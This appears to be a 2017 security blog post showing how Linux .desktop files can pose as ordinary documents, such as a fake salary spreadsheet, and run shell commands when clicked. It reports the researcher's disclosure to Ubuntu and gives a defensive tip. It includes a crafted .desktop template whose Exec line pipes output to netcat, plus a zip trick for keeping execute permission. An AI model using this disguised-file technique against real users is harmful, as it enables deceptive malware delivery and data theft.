Using Ubuntu .DESKTOP as a Malware Vector

Saturday. April 08, 2017 - 3 mins

I have noticed a weird behavior in .DESKTOP file extensions that can be used as a malware vector. This issue is not detected as malware by all known AVs, and the way it behaves makes it a rich resource for spreading malware against Ubuntu and Linux Desktop users in general. I will focus on Ubuntu Desktop in this blog post.

Introduction

File managers on Ubuntu (Nautilus, Caja, and Thunar are tested) specially treat .desktop. It parses .desktop and views the files as saved on their .desktop entry. In addition, it also changes the file icon to the one specified in the .desktop entry.

Example .desktop File

Let’s say the filename is “firefox.desktop”, and it’s saved at “/root/test/”

#!/usr/bin/env xdg-open

[Desktop Entry]
Version=1.0
Type=Application
Name = Firefox Browser
Comment = Firefox Browser
Icon = /path/to/icon

When navigating to “/root/test” via a file manager, we will see a file called “Firefox Browser” and an Icon of Firefox instead of seeing a file called “firefox.desktop”.

Let’s dive more into “Desktop Entry” options.

One of the most interesting entries is “Exec”. It will take the input and pass it to the shell to be executed. That doesn’t sound nice.

We can inject a payload and custom-crafted .desktop design that mimics an interesting file.

#!/usr/bin/env xdg-open

[Desktop Entry]
Version=1.0
Type=Application
Terminal=false
Name = Employees Salary.xslx
Comment = Employees Salary.xslx
Icon = libreoffice-calc
Exec = /bin/sh -c "id | nc 127.0.0.1 1337"

Saving the file as “payload.desktop”, when it’s viewed, it will be viewed thanks to file managers as “Employees Salary.xslx” with LibreOffice icon. Once a user clicks on the file, the payload will be executed.

Profit?

Stealthy malware vector on Ubuntu Desktop.

Obstacles of Successful Exploitation

Executing permissions would be an issue in exploitation. When a .desktop file does not have execution permission, we get the following error:

This error can be bypassed by presetting the permissions to 07555, for example, to be executed, then ZIPPing the file and delivering it as a ZIP archive. When it’s decompressed, the same permissions will be outputted. The malware vector generally works with any distribution that supports .desktop extensions.

Proof of Concept

I have made a test repository with a simple PoC that will pop up a calc.

To test on your local machine:

$ git clone "https://github.com/mazen160/Ubuntu-Desktop-Malware-Vector-Demo.git"

Then, navigate to the “Demo” folder using a file manager. You will see the following when clicking on the file:

Actions

I have contacted Ubuntu security, and they have decided to accept the risk of this issue. Therefore, the issue is still there and affects millions of users online.

Recommendation

It’s tricky to recommend stopping the usage of File Managers to mitigate the issue. However, I recommend checking/opening untrusted files via CLI. This helps in detecting the exploitation of .desktop malware vectors.

Final Thoughts

This was an interesting idea I had in my mind that I thought of sharing it. I’m looking forward to your opinions regarding this technique.

Mazin Ahmed

Thoughts of a hacker